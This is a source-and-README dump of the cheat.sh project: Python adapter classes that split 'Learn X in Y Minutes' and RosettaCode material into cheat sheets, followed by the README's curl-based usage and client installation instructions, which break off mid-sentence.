If `partial`, cheat sheet name may be shortened """ if name == ":list": return "\n".join(self.get_list()) + "\n" if name == ":learn": if self._whole_cheatsheet: return "\n".join(self._whole_cheatsheet) + "\n" else: return "" if partial: possible_names = [] for block_name, _ in self._blocks: if block_name.startswith(name): possible_names.append(block_name) if possible_names == [] or len(possible_names) > 1: return None name = possible_names[0] for block_name, block_contents in self._blocks: if block_name == name: return "\n".join(block_contents) return None # # Specific programming languages LearnXY cheat sheets configurations # Contains much code for the moment; should contain data only # ideally should be replaced with YAML # class LearnAwkAdapter(LearnXYAdapter): "Learn AWK in Y Minutes" prefix = "awk" _filename = "awk.html.markdown" _splitted = False class LearnBashAdapter(LearnXYAdapter): "Learn Bash in Y Minutes" prefix = "bash" _filename = "bash.html.markdown" _splitted = False class LearnBfAdapter(LearnXYAdapter): "Learn Brainfuck in Y Minutes" prefix = "bf" _filename = "bf.html.markdown" _splitted = False class LearnCAdapter(LearnXYAdapter): "Learn C in Y Minutes" prefix = "c" _filename = "c.html.markdown" _splitted = False class LearnChapelAdapter(LearnXYAdapter): "Learn Chapel in Y Minutes" prefix = "chapel" _filename = "chapel.html.markdown" _splitted = False class LearnClojureAdapter(LearnXYAdapter): """ Learn Clojure in Y Minutes """ prefix = "clojure" _filename = "clojure.html.markdown" def _is_block_separator(self, before, now, after): if (re.match(r'\s*$', before) and re.match(r';\s*', now) and re.match(r';;;;;;+', after)): block_name = re.sub(r';\s*', '', now) block_name = '_'.join([x.strip(",&:") for x in block_name.strip(", ").split()]) return block_name return None @staticmethod def _cut_block(block, start_block=False): if not start_block: answer = block[2:] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnCoffeeScriptAdapter(LearnXYAdapter): "Learn coffeescript in Y Minutes" prefix = "coffee" _filename = "coffeescript.html.markdown" _splitted = False class LearnCppAdapter(LearnXYAdapter): """ Learn C++ in Y Minutes """ prefix = "cpp" _filename = "c++.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'////////*', before) and re.match(r'// ', now) and re.match(r'////////*', after)): block_name = re.sub(r'//\s*', '', now).replace('(', '').replace(')', '') block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer == []: return answer if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnCsharpAdapter(LearnXYAdapter): "Learn C# in Y Minutes" prefix = "csharp" _filename = "csharp.html.markdown" _splitted = False class LearnDAdapter(LearnXYAdapter): "Learn D in Y Minutes" prefix = "d" _filename = "d.html.markdown" _splitted = False class LearnDartAdapter(LearnXYAdapter): "Learn Dart in Y Minutes" prefix = "dart" _filename = "dart.html.markdown" _splitted = False class LearnFactorAdapter(LearnXYAdapter): "Learn Factor in Y Minutes" prefix = "factor" _filename = "factor.html.markdown" 
_splitted = False class LearnForthAdapter(LearnXYAdapter): "Learn Forth in Y Minutes" prefix = "forth" _filename = "forth.html.markdown" _splitted = False class LearnFsharpAdapter(LearnXYAdapter): "Learn F# in Y Minutes" prefix = "fsharp" _filename = "fsharp.html.markdown" _splitted = False class LearnElispAdapter(LearnXYAdapter): "Learn Elisp in Y Minutes" prefix = "elisp" _filename = "elisp.html.markdown" _splitted = False class LearnElixirAdapter(LearnXYAdapter): """ Learn Elixir in Y Minutes """ prefix = "elixir" _filename = "elixir.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'## ---*', before) and re.match(r'## --', now) and re.match(r'## ---*', after)): block_name = re.sub(r'## --\s*', '', now) block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnElmAdapter(LearnXYAdapter): """ Learn Elm in Y Minutes """ prefix = "elm" _filename = "elm.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'\s*', before) and re.match(r'\{--.*--\}', now) and re.match(r'\s*', after)): block_name = re.sub(r'\{--+\s*', '', now) block_name = re.sub(r'--\}', '', block_name) block_name = '_'.join(block_name.strip(", ").split()) for character in '/,': block_name = block_name.replace(character, '') for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnErlangAdapter(LearnXYAdapter): """ Learn Erlang in Y Minutes """ prefix = "erlang" _filename = "erlang.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('%%%%%%+', before) and re.match(r'%%\s+[0-9]+\.', now) and re.match('%%%%%%+', after)): block_name = re.sub(r'%%+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip('.').strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnFortranAdapter(LearnXYAdapter): "Learn Fortran in Y Minutes" prefix = "fortran" _filename = "fortran95.html.markdown" _splitted = False class LearnGoAdapter(LearnXYAdapter): "Learn Go in Y Minutes" prefix = "go" _filename = "go.html.markdown" _splitted = False class LearnGroovyAdapter(LearnXYAdapter): "Learn Groovy in Y Minutes" prefix = "groovy" _filename = "groovy.html.markdown" _splitted = False class LearnJavaAdapter(LearnXYAdapter): "Learn Java in Y Minutes" prefix = "java" _filename = "java.html.markdown" _splitted = False class LearnJavaScriptAdapter(LearnXYAdapter): """ Learn JavaScript in Y Minutes """ prefix = "js" _filename = "javascript.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match('//////+', before) and re.match(r'//+\s+[0-9]+\.', now) and re.match(r'\s*', 
after)): block_name = re.sub(r'//+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip(", ").split()) for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnJuliaAdapter(LearnXYAdapter): """ Learn Julia in Y Minutes """ prefix = "julia" _filename = "julia.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('####+', before) and re.match(r'##\s*', now) and re.match('####+', after)): block_name = re.sub(r'##\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip(", ").split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnHaskellAdapter(LearnXYAdapter): """ Learn Haskell in Y Minutes """ prefix = "haskell" _filename = "haskell.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match('------+', before) and re.match(r'--+\s+[0-9]+\.', now) and re.match('------+', after)): block_name = re.sub(r'--+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip(", ").split()) for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnLispAdapter(LearnXYAdapter): "Learn Lisp in Y Minutes" prefix = "lisp" _filename = "common-lisp.html.markdown" _splitted = False class LearnLuaAdapter(LearnXYAdapter): """ Learn Lua in Y Minutes """ prefix = "lua" _filename = "lua.html.markdown" _replace_with = { '1_Metatables_and_metamethods': 'Metatables', '2_Class-like_tables_and_inheritance': 'Class-like_tables', 'Variables_and_flow_control': 'Flow_control', } def _is_block_separator(self, before, now, after): if (re.match('-----+', before) and re.match('-------+', after) and re.match(r'--\s+[0-9]+\.', now)): block_name = re.sub(r'--+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip('.').strip().split()) if block_name in self._replace_with: block_name = self._replace_with[block_name] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnMathematicaAdapter(LearnXYAdapter): "Learn Mathematica in Y Minutes" prefix = "mathematica" _filename = "wolfram.html.markdown" _splitted = False class LearnMatlabAdapter(LearnXYAdapter): "Learn Matlab in Y Minutes" prefix = "matlab" _filename = "matlab.html.markdown" _splitted = False class LearnOctaveAdapter(LearnXYAdapter): "Learn Octave in Y Minutes" prefix = "octave" _filename = "matlab.html.markdown" _splitted = False class LearnKotlinAdapter(LearnXYAdapter): """ Learn Kotlin in Y Minutes """ prefix = "kotlin" _filename = "kotlin.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('#######+', before) and re.match('#######+', after) and re.match(r'#+\s+[0-9]+\.', now)): block_name = re.sub(r'#+\s+[0-9]+\.\s*', '', now) block_name = 
'_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnObjectiveCAdapter(LearnXYAdapter): "Learn Objective C in Y Minutes" prefix = "objective-c" _filename = "objective-c.html.markdown" _splitted = False class LearnOCamlAdapter(LearnXYAdapter): """ Learn OCaml in Y Minutes """ prefix = "ocaml" _filename = "ocaml.html.markdown" _replace_with = { 'More_about_Objects': 'Prototypes', } def _is_block_separator(self, before, now, after): if (re.match(r'\s*', before) and re.match(r'\(\*\*\*+', now) and re.match(r'\s*', after)): block_name = re.sub(r'\(\*\*\*+\s*', '', now) block_name = re.sub(r'\s*\*\*\*\)', '', block_name) block_name = '_'.join(block_name.strip(", ").split()) for k in self._replace_with: if k in block_name: block_name = self._replace_with[k] return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnPerlAdapter(LearnXYAdapter): """ Learn Perl in Y Minutes """ prefix = "perl" _filename = "perl.html.markdown" _replace_with = { 'Conditional_and_looping_constructs': 'Control_Flow', 'Perl_variable_types': 'Types', 'Files_and_I/O': 'Files', 'Writing_subroutines': 'Subroutines', } def _is_block_separator(self, before, now, after): if re.match(r'####+\s+', now): block_name = re.sub(r'#+\s', '', now) block_name = '_'.join(block_name.strip().split()) if block_name in self._replace_with: block_name = self._replace_with[block_name] return block_name else: return None @staticmethod def _cut_block(block, start_block=False): if not start_block: answer = block[2:] if answer == []: return answer if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnPerl6Adapter(LearnXYAdapter): "Learn Perl 6 in Y Minutes" prefix = "perl6" _filename = "perl6.html.markdown" _splitted = False class LearnPHPAdapter(LearnXYAdapter): """ Learn PHP in Y Minutes """ prefix = "php" _filename = "php.html.markdown" def _is_block_separator(self, before, now, after): if (re.match(r'/\*\*\*\*\*+', before) and re.match(r'\s*\*/', after) and re.match(r'\s*\*\s*', now)): block_name = re.sub(r'\s*\*\s*', '', now) block_name = re.sub(r'&', '', block_name) block_name = '_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): return block[2:] class LearnPythonAdapter(LearnXYAdapter): """ Learn Python in Y Minutes """ prefix = "python" _filename = "python.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('#######+', before) and re.match('#######+', after) and re.match(r'#+\s+[0-9]+\.', now)): block_name = re.sub(r'#+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnPython3Adapter(LearnXYAdapter): "Learn Python 3 in Y Minutes" prefix = "python3" _filename = "python3.html.markdown" _splitted = False class LearnRAdapter(LearnXYAdapter): "Learn R in Y Minutes" prefix = "r" _filename = "r.html.markdown" _splitted = False class 
LearnRacketAdapter(LearnXYAdapter): "Learn Racket in Y Minutes" prefix = "racket" _filename = "racket.html.markdown" _splitted = False class LearnRubyAdapter(LearnXYAdapter): """ Learn Ruby in Y Minutes Format of the file was changed, so we have to fix the function too. This case is a good case for health check: if number of extracted cheat sheets is suddenly became 1, one should check the markup """ prefix = "ruby" _filename = "ruby.html.markdown" def _is_block_separator(self, before, now, after): if (re.match('#######+', before) and re.match('#######+', after) and re.match(r'#+\s+[0-9]+\.', now)): block_name = re.sub(r'#+\s+[0-9]+\.\s*', '', now) block_name = '_'.join(block_name.strip().split()) return block_name return None @staticmethod def _cut_block(block, start_block=False): answer = block[2:-1] if answer[0].split() == '': answer = answer[1:] if answer[-1].split() == '': answer = answer[:1] return answer class LearnRustAdapter(LearnXYAdapter): "Learn Rust in Y Minutes" prefix = "rust" _filename = "rust.html.markdown" _splitted = False class LearnSolidityAdapter(LearnXYAdapter): "Learn Solidity in Y Minutes" prefix = "solidity" _filename = "solidity.html.markdown" _splitted = False class LearnSwiftAdapter(LearnXYAdapter): "Learn Swift in Y Minutes" prefix = "swift" _filename = "swift.html.markdown" _splitted = False class LearnTclAdapter(LearnXYAdapter): "Learn Tcl in Y Minutes" prefix = "tcl" _filename = "tcl.html.markdown" _splitted = False class LearnTcshAdapter(LearnXYAdapter): "Learn Tcsh in Y Minutes" prefix = "tcsh" _filename = "tcsh.html.markdown" _splitted = False class LearnVisualBasicAdapter(LearnXYAdapter): "Learn Visual Basic in Y Minutes" prefix = "vb" _filename = "visualbasic.html.markdown" _splitted = False class LearnCMakeAdapter(LearnXYAdapter): "Learn CMake in Y Minutes" prefix = "cmake" _filename = "cmake.html.markdown" _splitted = False class LearnNimAdapter(LearnXYAdapter): "Learn Nim in Y Minutes" prefix = "nim" _filename = "nim.html.markdown" _splitted = False class LearnGitAdapter(LearnXYAdapter): "Learn Git in Y Minutes" prefix = "git" _filename = "git.html.markdown" _splitted = False class LearnLatexAdapter(LearnXYAdapter): "Learn Nim in Y Minutes" prefix = "latex" _filename = "latex.html.markdown" _splitted = False _ADAPTERS = {cls.prefix: cls() for cls in vars()['LearnXYAdapter'].__subclasses__()} File: lib/adapter/common.py class Adapter(object): pass class cheatAdapter(Adapter): pass File: lib/adapter/rosetta.py """ Implementation of RosettaCode Adapter. 
Exports: Rosetta(GitRepositoryAdapter) """ # pylint: disable=relative-import import os import glob import yaml from .git_adapter import GitRepositoryAdapter from .cheat_sheets import CheatSheets class Rosetta(GitRepositoryAdapter): """ Adapter for RosettaCode """ _adapter_name = "rosetta" _output_format = "code" _local_repository_location = "RosettaCodeData" _repository_url = "https://github.com/acmeism/RosettaCodeData" __section_name = "rosetta" def __init__(self): GitRepositoryAdapter.__init__(self) self._rosetta_code_name = self._load_rosetta_code_names() @staticmethod def _load_rosetta_code_names(): answer = {} lang_files_location = CheatSheets.local_repository_location(cheat_sheets_location=True) for filename in glob.glob(os.path.join(lang_files_location, '*/_info.yaml')): text = open(filename, 'r').read() data = yaml.load(text, Loader=yaml.SafeLoader) if data is None: continue lang = os.path.basename(os.path.dirname(filename)) if lang.startswith('_'): lang = lang[1:] if 'rosetta' in data: answer[lang] = data['rosetta'] return answer def _rosetta_get_list(self, query, task=None): if query not in self._rosetta_code_name: return [] lang = self._rosetta_code_name[query] answer = [] if task: glob_path = os.path.join(self.local_repository_location(), 'Lang', lang, task, '*') else: glob_path = os.path.join(self.local_repository_location(), 'Lang', lang, '*') for filename in glob.glob(glob_path): taskname = os.path.basename(filename) answer.append(taskname) answer = "".join("%s\n" % x for x in sorted(answer)) return answer @staticmethod def _parse_query(query): if '/' in query: task, subquery = query.split('/', 1) else: task, subquery = query, None return task, subquery def _get_task(self, lang, query): if lang not in self._rosetta_code_name: return "" task, subquery = self._parse_query(query) if task == ':list': return self._rosetta_get_list(lang) if subquery == ':list': return self._rosetta_get_list(lang, task=task) # if it is not a number or the number is too big, just ignore it index = 1 if subquery: try: index = int(subquery) except ValueError: pass lang_name = self._rosetta_code_name[lang] tasks = sorted(glob.glob( os.path.join(self.local_repository_location(), 'Lang', lang_name, task, '*'))) if not tasks: return "" if len(tasks) < index or index < 1: index = 1 answer_filename = tasks[index-1] answer = open(answer_filename, 'r').read() return answer def _starting_page(self, query): number_of_pages = self._rosetta_get_list(query) answer = ( "# %s pages available\n" "# use /:list to list" ) % number_of_pages return answer def _get_page(self, topic, request_options=None): if '/' not in topic: return self._rosetta_get_list(topic) lang, topic = topic.split('/', 1) # this part should be generalized # currently we just remove the name of the adapter from the path if topic == self.__section_name: return self._starting_page(topic) if topic.startswith(self.__section_name + '/'): topic = topic[len(self.__section_name + '/'):] return self._get_task(lang, topic) def _get_list(self, prefix=None): return [] def get_list(self, prefix=None): answer = [self.__section_name] for i in self._rosetta_code_name: answer.append('%s/%s/' % (i, self.__section_name)) return answer def is_found(self, _): return True File: lib/adapter/upstream.py """ Adapter for an external cheat sheets service (i.e. 
for cheat.sh) Configuration parameters: upstream.url upstream.timeout """ # pylint: disable=relative-import import textwrap import requests from config import CONFIG from .adapter import Adapter def _are_you_offline(): return textwrap.dedent( """ . Are you offline? _________________ | | ___________ |o| Though it could be theoretically possible | | ___________ | | to use cheat.sh fully offline, | | ___________ | | and for *the programming languages questions* too, | | ___________ | | this very feature is not yet implemented. | |_____________| | | _______ | If you find it useful, please visit | | | || https://github.com/chubin/issues/140 | DD | | V| and drop a couple of lines to encourage |____|_______|____| the authors to develop it as soon as possible . """) class UpstreamAdapter(Adapter): """ Connect to the upstream server `CONFIG["upstream.url"]` and fetch response from it. The response is supposed to have the "ansi" format. If the server does not respond within `CONFIG["upstream.timeout"]` seconds, or if a connection error occurs, the "are you offline" banner is displayed. Answers are by default cached; the failure answer is marked with the no-cache property ("cache": False). """ _adapter_name = "upstream" _output_format = "ansi" _cache_needed = False def _get_page(self, topic, request_options=None): options_string = "&".join(["%s=%s" % (x, y) for (x, y) in request_options.items()]) url = CONFIG["upstream.url"].rstrip('/') \ + '/' + topic.lstrip('/') \ + "?" + options_string try: response = requests.get(url, timeout=CONFIG["upstream.timeout"]) answer = {"cache": False, "answer": response.text} except requests.exceptions.ConnectionError: answer = {"cache": False, "answer":_are_you_offline()} return answer def _get_list(self, prefix=None): return [] File: lib/adapter/git_adapter.py """ Implementation of `GitRepositoryAdapter`, adapter that is used to handle git repositories """ import glob import os from .adapter import Adapter # pylint: disable=relative-import def _get_filenames(path): return [os.path.split(topic)[1] for topic in glob.glob(path)] class RepositoryAdapter(Adapter): """ Implements methods needed to handle standard repository based adapters. """ def _get_list(self, prefix=None): """ List of files in the cheat sheets directory with the extension removed """ answer = _get_filenames( os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, '*'+self._cheatsheet_files_extension)) ext = self._cheatsheet_files_extension if ext: answer = [filename[:-len(ext)] for filename in answer if filename.endswith(ext)] return answer def _get_page(self, topic, request_options=None): filename = os.path.join( self.local_repository_location(), self._cheatsheet_files_prefix, topic) if os.path.exists(filename) and not os.path.isdir(filename): answer = self._format_page(open(filename, 'r').read()) else: # though it should not happen answer = "%s:%s not found" % (str(self.__class__), topic) return answer class GitRepositoryAdapter(RepositoryAdapter): #pylint: disable=abstract-method """ Implements all methods needed to handle cache handling for git-repository-based adapters """ @classmethod def fetch_command(cls): """ Initial fetch of the repository. Return cmdline that has to be executed to fetch the repository. 
Skipping if `self._repository_url` is not specified """ if not cls._repository_url: return None if not cls._repository_url.startswith('https://github.com/'): # in this case `fetch` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None return ['git', 'clone', '--depth=1', cls._repository_url, local_repository_dir] @classmethod def update_command(cls): """ Update of the repository. Return cmdline that has to be executed to update the repository inside `local_repository_location()`. """ if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None if not cls._repository_url.startswith('https://github.com/'): # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) return ['git', 'pull'] @classmethod def current_state_command(cls): """ Get current state of repository (current revision). This is used to find what cache entries should be invalidated. """ if not cls._repository_url: return None local_repository_dir = cls.local_repository_location() if not local_repository_dir: return None if not cls._repository_url.startswith('https://github.com/'): # in this case `update` has to be implemented # in the distinct adapter subclass raise RuntimeError( "Do not known how to handle this repository: %s" % cls._repository_url) return ['git', 'rev-parse', '--short', 'HEAD', "--"] @classmethod def save_state(cls, state): """ Save state `state` of the repository. Must be called after the cache clean up. """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') open(state_filename, 'wb').write(state) @classmethod def get_state(cls): """ Return the saved `state` of the repository. If state cannot be read, return None """ local_repository_dir = cls.local_repository_location() state_filename = os.path.join(local_repository_dir, '.cached_revision') state = None if os.path.exists(state_filename): state = open(state_filename, 'r').read() return state @classmethod def get_updates_list_command(cls): """ Return list of updates since the last update whose id is saved as the repository state. The list is used to invalidate the cache. """ current_state = cls.get_state() if not current_state: return ['git', 'ls-tree', '--full-tree', '-r', '--name-only', 'HEAD', "--"] return ['git', 'diff', '--name-only', current_state, 'HEAD', "--"]
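The command-builder classmethods above only return argv lists; the surrounding application is expected to execute them and store the resulting revision via `save_state()`. Below is a rough sketch of such a driver, not the project's actual fetch logic; the `refresh_repository` helper is hypothetical and assumes a git-backed adapter class (a `GitRepositoryAdapter` subclass with `_repository_url` set).

```python
# Hypothetical driver for the command builders above (a sketch, not the
# project's actual fetch logic). Assumes a git-backed adapter class such as
# a GitRepositoryAdapter subclass with _repository_url configured.
import subprocess


def refresh_repository(adapter_cls):
    """Clone the repository on first use, otherwise pull, and return the
    list of files changed since the previously cached revision."""
    repo_dir = adapter_cls.local_repository_location()

    if adapter_cls.get_state() is None:
        # Never fetched before: ['git', 'clone', '--depth=1', url, repo_dir]
        subprocess.run(adapter_cls.fetch_command(), check=True)
    else:
        # Already cloned: ['git', 'pull'], run inside the working copy
        subprocess.run(adapter_cls.update_command(), check=True, cwd=repo_dir)

    # Files changed since the cached revision; used to invalidate cache entries
    changed = subprocess.run(
        adapter_cls.get_updates_list_command(),
        cwd=repo_dir, capture_output=True, text=True, check=True,
    ).stdout.splitlines()

    # Remember the new revision (save_state() expects bytes)
    revision = subprocess.run(
        adapter_cls.current_state_command(),
        cwd=repo_dir, capture_output=True, text=True, check=True,
    ).stdout.strip()
    adapter_cls.save_state(revision.encode())

    return changed
```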
![cheat.sh logo](http://cheat.sh/files/big-logo-v2-fixed.png) Unified access to the best community driven cheat sheets repositories of the world. Let's imagine for a moment that there is such a thing as an ideal cheat sheet. What should it look like? What features should it have? * **Concise** — It should only contain the things you need, and nothing else. * **Fast** — It should be possible to use it instantly. * **Comprehensive** — It should contain answers for every possible question. * **Universal** — It should be available everywhere, anytime, without any preparations. * **Unobtrusive** — It should not distract you from your main task. * **Tutoring** — It should help you to learn the subject. * **Inconspicuous** — It should be possible to use it completely unnoticed. Such a thing exists! It's easy to [install](#installation) and there's even [auto-complete](#tab-completion). ## Features **cheat.sh** * Has a simple curl/browser/editor interface. * Covers 56 programming languages, several DBMSes, and more than 1000 most important UNIX/Linux commands. * Provides access to the best community driven cheat sheets repositories in the world, on par with StackOverflow. * Available everywhere, no installation needed, but can be installed for offline usage. * Ultrafast, returns answers within 100 ms, as a rule. * Has a convenient command line client, `cht.sh`, that is very advantageous and helpful, though not mandatory. * Can be used directly from code editors, without opening a browser and not switching your mental context. * Supports a special stealth mode where it can be used fully invisibly without ever touching a key and making sounds. <p align="center"> <img src='https://cheat.sh/files/demo-curl.gif'/> </p> ## Contents * [Features](#features) * [Usage](#usage) * [Command line client, cht.sh](#command-line-client-chtsh) * [Installation](#installation) * [Client usage](#client-usage) * [Tab-completion](#tab-completion) - [Bash Tab completion](#bash-tab-completion) - [ZSH Tab completion](#zsh-tab-completion) * [Stealth mode](#stealth-mode) * [Windows command line client](#windows-command-line-client) * [Self-Hosting](#self-hosting) * [Docker](#docker) * [Editors integration](#editors-integration) * [Vim](#vim) * [Emacs](#emacs) * [Visual Studio Code](#visual-studio-code) * [Sublime](#sublime) * [IntelliJ IDEA](#intellij-idea) * [QT Creator](#qtcreator) * [Special pages](#special-pages) * [Search](#search) * [Programming languages cheat sheets](#programming-languages-cheat-sheets) * [Cheat sheets sources](#cheat-sheets-sources) * [How to contribute](#how-to-contribute) * [How to edit a cheat sheet](#how-to-edit-a-cheat-sheet) * [How to add a cheat sheet](#how-to-add-a-cheat-sheet) * [How to add a cheat sheet repository](#how-to-add-a-cheat-sheet-repository) ## Usage To get a cheat sheet for a UNIX/Linux command from a command line, query the service using `curl` or any other HTTP/HTTPS client specifying the name of the command in the query: ``` curl cheat.sh/tar curl cht.sh/curl curl https://cheat.sh/rsync curl https://cht.sh/tr ``` As you can see, you can use both HTTPS and HTTP to access the service, and both the long (cheat.sh) and the short (cht.sh) service names. Here `tar`, `curl`, `rsync`, and `tr` are names of the UNIX/Linux commands you want to get cheat sheets for. If you don't know the name of the command you need, you can search for it using the `~KEYWORD` notation. 
For example, to see how you can make `snapshots` of a filesystem/volume/something else:

```
curl cht.sh/~snapshot
```

<p align="center">
  <img src='https://cheat.sh/files/cht.sh-url-structure.png'/>
</p>

The programming language cheat sheets are located in special namespaces dedicated to them.

```
curl cht.sh/go/Pointers
curl cht.sh/scala/Functions
curl cht.sh/python/lambda
```

To get the list of available programming language cheat sheets, use the special query `:list`:

```
curl cht.sh/go/:list
```

Almost every programming language has a special page named `:learn` that describes the language basics (it's a direct mapping from the *"Learn X in Y"* project). It can be a good starting point if you've just started learning a language.

If there is no cheat sheet for a programming language query (and that is almost always the case), it is generated on the fly, based on available cheat sheets and answers on StackOverflow. Of course, there is no guarantee that the returned cheat sheet will be a 100% hit, but it is almost always exactly what you are looking for.

Try these (and your own) queries to get an impression of what the answers look like:

```
curl cht.sh/go/reverse+a+list
curl cht.sh/python/random+list+elements
curl cht.sh/js/parse+json
curl cht.sh/lua/merge+tables
curl cht.sh/clojure/variadic+function
```

If you don't like an answer to your query, you can pick another one. To do so, repeat the query with an additional parameter `/1`, `/2` etc. appended:

```
curl cht.sh/python/random+string
curl cht.sh/python/random+string/1
curl cht.sh/python/random+string/2
```

Cheat sheets are formatted as code in the queried programming language (at least, we try our best to do so), so they can be pasted into a program in that language directly. Text comments, if there are any, are formatted according to the language syntax.

```lua
$ curl cht.sh/lua/table+keys
-- lua: retrieve list of keys in a table

local keyset={}
local n=0

for k,v in pairs(tab) do
  n=n+1
  keyset[n]=k
end

--[[
   [ Note that you cannot guarantee any order in keyset. If you want the
   [ keys in sorted order, then sort keyset with table.sort(keyset).
   [
   [ [lhf] [so/q/12674345] [cc by-sa 3.0]
   ]]
```

If you don't need text comments in the answer, you can eliminate them using the special option `\?Q`:

```lua
$ curl cht.sh/lua/table+keys\?Q
local keyset={}
local n=0

for k,v in pairs(tab) do
  n=n+1
  keyset[n]=k
end
```

And if you don't need syntax highlighting, switch it off using `\?T`. You can combine the options:

```
curl cht.sh/go/reverse+a+list\?Q
curl cht.sh/python/random+list+elements\?Q
curl cht.sh/js/parse+json\?Q
curl cht.sh/lua/merge+tables\?QT
curl cht.sh/clojure/variadic+function\?QT
```

The full list of options is described below and in `/:help`.

Try your own queries. Follow these rules:

1. Try to be more specific (`/python/append+file` is better than `/python/file` and `/python/append`).
2. Ask practical questions if possible (though theoretical questions are possible too).
3. Ask programming language questions only; specify the name of the programming language as the section name.
4. Separate words with `+` instead of spaces.
5. Do not use special characters; they are ignored anyway.
6. If you want to exclude cheat sheets containing some word, add it to the query with `+-`: `python/multiply+matrices+-numpy`

Read more about the programming language queries below.
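Because the interface is plain HTTP, the same queries also work from scripts. Here is a minimal Python sketch (an illustration, not part of cheat.sh itself) that builds a query URL with the `?Q`/`?T` options described above; it assumes the third-party `requests` package is installed, and the sample query is just an example:

```python
# Query cheat.sh programmatically; a minimal sketch of the public HTTP
# interface described above (requires the third-party `requests` package).
import requests


def cheat(topic, question, no_comments=False, no_colors=True):
    """Fetch an answer, e.g. cheat("python", "reverse a list")."""
    options = ("Q" if no_comments else "") + ("T" if no_colors else "")
    url = "https://cheat.sh/{}/{}".format(topic, question.replace(" ", "+"))
    if options:
        url += "?" + options  # same ?Q / ?T options as in the curl examples
    return requests.get(url, timeout=10).text


if __name__ == "__main__":
    print(cheat("python", "reverse a list", no_comments=True))
```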
---- ## Command line client, cht.sh The cheat.sh service has its own command line client (`cht.sh`) that has several useful features compared to querying the service directly with `curl`: * Special shell mode with a persistent queries context and readline support. * Queries history. * Clipboard integration. * Tab completion support for shells (bash, fish, zsh). * Stealth mode. ### Installation To install the client: ```bash PATH_DIR="$HOME/bin" # or another directory on your $PATH mkdir -p "$PATH_DIR" curl https://cht.sh/:cht.sh > "$PATH_DIR/cht.sh" chmod +x "$PATH_DIR/cht.sh" ``` or to install it globally (for all users): ```bash curl -s https://cht.sh/:cht.sh | sudo tee /usr/local/bin/cht.sh && sudo chmod +x /usr/local/bin/cht.sh ``` Note: The package "rlwrap" is a required dependency to run in shell mode. Install this using `sudo apt install rlwrap` ### Client usage Now, you can use `cht.sh` instead of `curl`, and write your queries in more natural way, with spaces instead of `+`: ``` $ cht.sh go reverse a list $ cht.sh python random list elements $ cht.sh js parse json ``` It is even more convenient to start the client in a special shell mode: ``` $ cht.sh --shell cht.sh> go reverse a list ``` If all your queries are about the same language, you can change the 